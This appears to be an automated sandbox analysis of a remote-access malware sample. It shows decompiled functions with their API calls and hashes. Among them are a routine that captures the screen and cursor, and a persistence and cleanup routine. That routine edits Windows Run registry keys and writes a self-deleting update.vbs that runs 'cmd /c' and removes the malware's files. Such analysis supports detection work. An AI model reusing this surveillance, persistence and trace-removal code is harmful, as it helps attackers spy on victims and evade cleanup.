
C-Code - Quality: 91%

			E0044A21B(void* __ecx, void* __edx, signed int* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				void* _t36;
				intOrPtr* _t39;
				intOrPtr* _t42;
				signed int _t48;
				void* _t51;
				void* _t52;
				signed int* _t53;
				void* _t54;
				signed int _t62;

				_t54 = L00441CE2(_t36, __ecx, __edx);
				_t48 = 2;
				_t39 =  *((intOrPtr*)(_t54 + 0x50));
				_t51 = _t39 + 2;
				do {
					_t26 =  *_t39;
					_t39 = _t39 + _t48;
				} while (_t26 != 0);
				_t42 =  *((intOrPtr*)(_t54 + 0x54));
				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
				_t52 = _t42 + 2;
				do {
					_t29 =  *_t42;
					_t42 = _t42 + _t48;
				} while (_t29 != 0);
				_t53 = _a4;
				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
				_t53[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t48 = E0044A317( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t48;
				_t32 = EnumSystemLocalesW(E0044A343, 1);
				_t62 =  *_t53 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t53 = 0;
					return _t34;
				}
				return _t34;
			}

0x0044a228
0x0044a22e
0x0044a22f
0x0044a232
0x0044a235
0x0044a235
0x0044a238
0x0044a23a
0x0044a248
0x0044a24e
0x0044a251
0x0044a254
0x0044a254
0x0044a257
0x0044a259
0x0044a262
0x0044a26d
0x0044a270
0x0044a276
0x0044a281
0x0044a281
0x0044a28a
0x0044a28d
0x0044a295
0x0044a29b
0x0044a29f
0x0044a2a4
0x0044a2a8
0x0044a2ad
0x0044a2af
0x00000000
0x0044a2af
0x0044a2b5

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

EnumSystemLocalesW.KERNEL32(0044A343,00000001,00000000,?,0043E2C1,?,0044A970,00000000,?,?,?), ref: 0044A28D

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
Instruction ID: fef6e57728511f2b9b1dd238f7a777dd7648a2b970c096311ec5bc0c4a713da2
Opcode Fuzzy Hash: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
Instruction Fuzzy Hash: 3F114C372007055FEB189F39C8916BBB791FF80359B14442DE98647740E7B6B952DB44

Uniqueness

Uniqueness Score: -1.00%

Function 0044A7C3, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0044A7C3(void* __ebx, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t24;
				signed int _t27;
				intOrPtr* _t29;

				_push(_t16);
				_t8 = L00441CE2(__ebx, _t16, _t22);
				_t27 = _a4;
				_t24 = _t8;
				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
					if(_t27 == _v8 || _a8 == 0) {
						L7:
						_t12 = 1;
					} else {
						_t29 =  *((intOrPtr*)(_t24 + 0x50));
						_t20 = _t29 + 2;
						do {
							_t13 =  *_t29;
							_t29 = _t29 + 2;
						} while (_t13 != 0);
						if(E0044A317( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
							goto L1;
						} else {
							goto L7;
						}
					}
				} else {
					L1:
					_t12 = 0;
				}
				return _t12;
			}

0x0044a7c8
0x0044a7cb
0x0044a7d0
0x0044a7d3
0x0044a7f7
0x0044a800
0x0044a82a
0x0044a82c
0x0044a808
0x0044a808
0x0044a80b
0x0044a80e
0x0044a80e
0x0044a811
0x0044a814
0x0044a828
0x00000000
0x00000000
0x00000000
0x00000000
0x0044a828
0x0044a7f9
0x0044a7f9
0x0044a7f9
0x0044a7f9
0x0044a832

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044A561,00000000,00000000,?), ref: 0044A7EF

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 1cd820401b6a1c1bbe6edf503f73b5c6d44779daf189f74fcf19ed8e0c0a0003
Instruction ID: 83d8b15de60c056d1b119042d664eee472c135ad5aa1af093dd0495062aa18b7
Opcode Fuzzy Hash: 1cd820401b6a1c1bbe6edf503f73b5c6d44779daf189f74fcf19ed8e0c0a0003
Instruction Fuzzy Hash: 3AF04932990116ABFB246B25CC057BBBB68EB00318F14442AEC05A3240EA38FE62C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 0044A2B6, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044A2B6(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t11;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				intOrPtr* _t20;
				intOrPtr _t25;
				void* _t26;
				void* _t27;

				_t27 = L00441CE2(_t17, __ecx, __edx);
				_t25 = 2;
				_t20 =  *((intOrPtr*)(_t27 + 0x50));
				_t26 = _t20 + 2;
				do {
					_t11 =  *_t20;
					_t20 = _t20 + _t25;
				} while (_t11 != 0);
				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
				 *(_t27 + 0x60) = _t13;
				if(_t13 == 0) {
					_t25 = E0044A317( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
				EnumSystemLocalesW(E0044A593, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}

0x0044a2c3
0x0044a2c9
0x0044a2ca
0x0044a2cd
0x0044a2d0
0x0044a2d0
0x0044a2d3
0x0044a2d5
0x0044a2e3
0x0044a2e6
0x0044a2eb
0x0044a2f6
0x0044a2f6
0x0044a2ff
0x0044a302
0x0044a308
0x0044a30e
0x0044a310
0x00000000
0x0044a310
0x0044a316

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

EnumSystemLocalesW.KERNEL32(0044A593,00000001,?,?,0043E2C1,?,0044A934,0043E2C1,?,?,?,?,?,0043E2C1,?,?), ref: 0044A302

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
Instruction ID: b467c6c7c7f8ac7ca1ad2f3a7ac430e87e8f1bd3a8912e360415dfb464baff1b
Opcode Fuzzy Hash: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
Instruction Fuzzy Hash: 28F022323403045FEB149F399C81A6A7B95FF80368B14443EF9418B690E6B6DC419A04

Uniqueness

Uniqueness Score: -1.00%

Function 0044A1D0, Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044A1D0(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t20 = L00441CE2(_t14, __ecx, __edx);
				_t16 =  *((intOrPtr*)(_t20 + 0x54));
				_t22 = _t16 + 2;
				do {
					_t9 =  *_t16;
					_t16 = _t16 + 2;
				} while (_t9 != 0);
				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x44a127, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}

0x0044a1dc
0x0044a1e0
0x0044a1e3
0x0044a1e6
0x0044a1e6
0x0044a1e9
0x0044a1ec
0x0044a204
0x0044a207
0x0044a20d
0x0044a213
0x0044a215
0x00000000
0x0044a215
0x0044a21a

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

EnumSystemLocalesW.KERNEL32(0044A127,00000001,?,?,?,0044A992,0043E2C1,?,?,?,?,?,0043E2C1,?,?,?), ref: 0044A207

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
Instruction ID: a7fadff6d2ca21f630832dc779862bf22c9b6182ed5b4a5894b7910ac126a48e
Opcode Fuzzy Hash: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
Instruction Fuzzy Hash: 1FF0553A38030557EB049F75DC49B6BBFA0FFC1719F06405AEA058B690C67AD942CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1E5, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040D1E5(void* __ecx) {
				char _v8;
				void* _t8;
				void* _t12;

				_push(__ecx);
				_t12 = __ecx;
				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
				E00402084(_t8, _t12,  &_v8);
				return _t12;
			}

0x0040d1e8
0x0040d1ef
0x0040d1f9
0x0040d205
0x0040d210

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00411E51,0046C238,0046C5B4,0046C238,00000000,0046C238,00000000,0046C238,3.2.1 Pro), ref: 0040D1F9

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
Instruction ID: ac7816e6a697d777cf06a73d6884089d523ece1dfcb51b9ad9a20d9ec724333c
Opcode Fuzzy Hash: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
Instruction Fuzzy Hash: 47D05E7074021DBBEA14D6959C0AEAB7B9CD701B66F0001A6BE04D72C0E9E1AE04C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0040F15D, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
Instruction ID: 7a46c63e6297807c5de7f1130092129a1d39734970edeb025e6968c5830d1d5b
Opcode Fuzzy Hash: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
Instruction Fuzzy Hash: 8F315A75A00115AFCB20CF59CD81B5AB7A9FF48354F1580B6ED04AB382D375EA64CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00414906, Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 298
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00414906(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = L00414D3D( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t114 = L00414D89( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							L00414DCA( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E004020D5(_t194,  &_v80);
												E004020D5(_t194,  &_v168);
												E0040251D(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E00403436( &_v80);
												E0040251D(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E00403436( &_v80);
												_t235 = _a4;
												E0040251D(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E00403436( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E00402044(_t194, _t194, __eflags,  &_v168);
												E00401FC7();
												E00401FC7();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E00402084(_t194, _t194, 0x45f6bc);
					L32:
					return _t194;
				}
			}

0x00414914
0x0041491f
0x00414927
0x0041492a
0x00414936
0x00414938
0x00414947
0x00414954
0x00414959
0x0041495c
0x00414961
0x0041497b
0x00414981
0x00414984
0x00414986
0x004149a0
0x004149a6
0x004149a8
0x004149c1
0x004149c5
0x004149d0
0x004149f0
0x004149f6
0x004149f8
0x00000000
0x00000000
0x004149fa
0x004149fe
0x00414a03
0x00414a0b
0x00414a11
0x00414a13
0x00414a1f
0x00414a25
0x00414a27
0x00414a41
0x00414a41
0x00414a44
0x00414a4d
0x00414a58
0x00414a5c
0x00414a62
0x00414a62
0x00414a27
0x00414a13
0x00414a68
0x00414a6b
0x00414a70
0x00414a76
0x00414a78
0x00000000
0x00414a7e
0x00414a85
0x00414a8b
0x00414a8e
0x00414a94
0x00414a96
0x00414a97
0x00414a9a
0x00414a9d
0x00414aca
0x00414aca
0x00414ad3
0x00414ad4
0x00414adc
0x00414ae0
0x00414ae1
0x00414aea
0x00414af0
0x00414af7
0x00414aff
0x00414b03
0x00414b06
0x00414b09
0x00414b10
0x00414b12
0x00414b12
0x00414b1e
0x00414b22
0x00414b26
0x00414b27
0x00414b35
0x00414b3c
0x00414b3f
0x00414b45
0x00414b48
0x00414b4a
0x00414b63
0x00414b69
0x00414b6b
0x00414b98
0x00414bac
0x00414bb1
0x00414bbc
0x00414bbc
0x00414bc2
0x00414bc5
0x00414bd0
0x00414bde
0x00414bed
0x00414bf8
0x00414c07
0x00414c0f
0x00414c16
0x00414c25
0x00414c2d
0x00414c34
0x00414c43
0x00414c46
0x00414c51
0x00414c5c
0x00414c64
0x00000000
0x00414c64
0x00414b76
0x00414b79
0x00414b7e
0x00414b88
0x00000000
0x00414b4c
0x00414b4c
0x004149ab
0x004149b1
0x004149b4
0x004149b6
0x00000000
0x004149b6
0x00414b4a
0x00414a9f
0x00414aa1
0x00414aa2
0x00414aa5
0x00414aa8
0x00000000
0x00000000
0x00414aaa
0x00414aac
0x00414aad
0x00414ab0
0x00414ab3
0x00000000
0x00000000
0x00414ab7
0x00414ab8
0x00414abb
0x00414ac4
0x00414ac6
0x00414ac7
0x00414ac7
0x00000000
0x00414ac7
0x00414abd
0x00414ac0
0x00000000
0x00414ac0
0x00000000
0x00414a90
0x00414a78
0x004149aa
0x004149aa
0x00000000
0x00414988
0x0041498f
0x00414992
0x00414994
0x00414996
0x00414996
0x00000000
0x00414996
0x00414967
0x00414967
0x0041496e
0x00414c6b
0x00414c71
0x00414c71

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
CreateCompatibleDC.GDI32(00000000), ref: 0041492D

Part of subcall function 00414D3D: GetMonitorInfoW.USER32(?,?), ref: 00414D5D

Part of subcall function 00414D89: GetMonitorInfoW.USER32(?,?), ref: 00414DA9

CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041497B
DeleteDC.GDI32(00000000), ref: 0041498F
DeleteDC.GDI32(00000000), ref: 00414992
DeleteObject.GDI32(?), ref: 00414996
SelectObject.GDI32(00000000,00000000), ref: 004149A0
DeleteDC.GDI32(00000000), ref: 004149B1
DeleteDC.GDI32(00000000), ref: 004149B4
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 004149F0
GetCursorInfo.USER32(?,?,?), ref: 00414A0B
GetIconInfo.USER32(?,?), ref: 00414A1F
DeleteObject.GDI32(?), ref: 00414A44
DeleteObject.GDI32(?), ref: 00414A4D
DrawIcon.USER32 ref: 00414A5C
GetObjectA.GDI32(?,00000018,?), ref: 00414A70
LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414AD6
GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 00414B3F
GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414B63
DeleteDC.GDI32(?), ref: 00414B76
DeleteDC.GDI32(00000000), ref: 00414B79
DeleteObject.GDI32(?), ref: 00414B7E
GlobalFree.KERNEL32 ref: 00414B88
DeleteObject.GDI32(?), ref: 00414C2D
GlobalFree.KERNEL32 ref: 00414C34
DeleteDC.GDI32(?), ref: 00414C43
DeleteDC.GDI32(00000000), ref: 00414C46

Strings

DISPLAY, xrefs: 0041491A

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
String ID: DISPLAY
API String ID: 517350757-865373369
Opcode ID: 5e19a8e7c5a1e7cfd16629166915223df8c5f8e766858db65ebc949d59fd66ec
Instruction ID: 04b928e990297c4dc387ef5bf1f87de0b325f6e157068eb4714aaf8e6101e2a9
Opcode Fuzzy Hash: 5e19a8e7c5a1e7cfd16629166915223df8c5f8e766858db65ebc949d59fd66ec
Instruction Fuzzy Hash: 1DB17171900319AFDB10DFA0DC45BEEBBB8EF44756F00402AF949E7290DB74AA45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0E2, Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 280
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040B0E2(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				E0041015B();
				if( *0x46a9d4 != 0x30) {
					L00409D73();
				}
				_t243 =  *0x46bd6b - 1; // 0x0
				if(_t243 == 0) {
					E0041537E(_t243);
				}
				if( *0x46ba75 != 0) {
					E00417754(L00401EEB(0x46c0e0));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x46bb02 - 1; // 0x1
				if(_t245 == 0) {
					E00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401EEB(0x46c4e8));
				}
				_t246 =  *0x46bafb - 1; // 0x0
				if(_t246 == 0) {
					E00410D5C(0x80000002, _t231, L00401EEB(0x46c4e8));
				}
				_t247 =  *0x46bb00 - 1; // 0x0
				if(_t247 == 0) {
					E00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401EEB(0x46c4e8));
				}
				_t53 = E00402489();
				_t54 = L00401F95(0x46c560);
				_t57 = E00410A30(L00401F95(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F95(0x46c518));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x46c530;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E004074E4(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46c530;
					SetFileAttributesW(L00401EEB(0x46c530), 0x80);
				}
				E004030A6(_t134,  &_v124, E0040427F(_t134,  &_v52, E0043987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				L00401EF0();
				E00404405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401EF0();
				_t250 = _t134;
				if(_t134 != 0) {
					E00403311(E004030A6(_t134,  &_v52, E00404405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					L00401EF0();
					L00401EF0();
					L00401EF0();
				}
				E00403311(E004030A6(_t134,  &_v100, E004030A6(_t134,  &_v76, E0040427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				_t251 = _t134;
				if(_t134 != 0) {
					E0040766C(_t134,  &_v28, 0, L"wend\n");
				}
				_t78 = E004074E4(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E00403311(E004030A6(0x45f724,  &_v100, L00409E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
					L00401EF0();
					L00401EF0();
				}
				_t79 = E0040427F(0x45f724,  &_v172, L"\"\"\", 0");
				E00403311(E004030A6(0x45f724,  &_v100, E00403030( &_v76, E00404429(0x45f724,  &_v52, E0040427F(0x45f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				E0040766C(0x45f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = L00401EEB( &_v124);
				_t93 = E00402489();
				if(E00417947(L00401EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401EEB( &_v124), 0x45f724, 0x45f724, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401EF0();
				L00401EF0();
				return L00401EF0();
			}

0x0040b0ee
0x0040b0fa
0x0040b0fc
0x0040b0fc
0x0040b104
0x0040b10a
0x0040b10c
0x0040b10c
0x0040b118
0x0040b126
0x0040b126
0x0040b130
0x0040b135
0x0040b13b
0x0040b14c
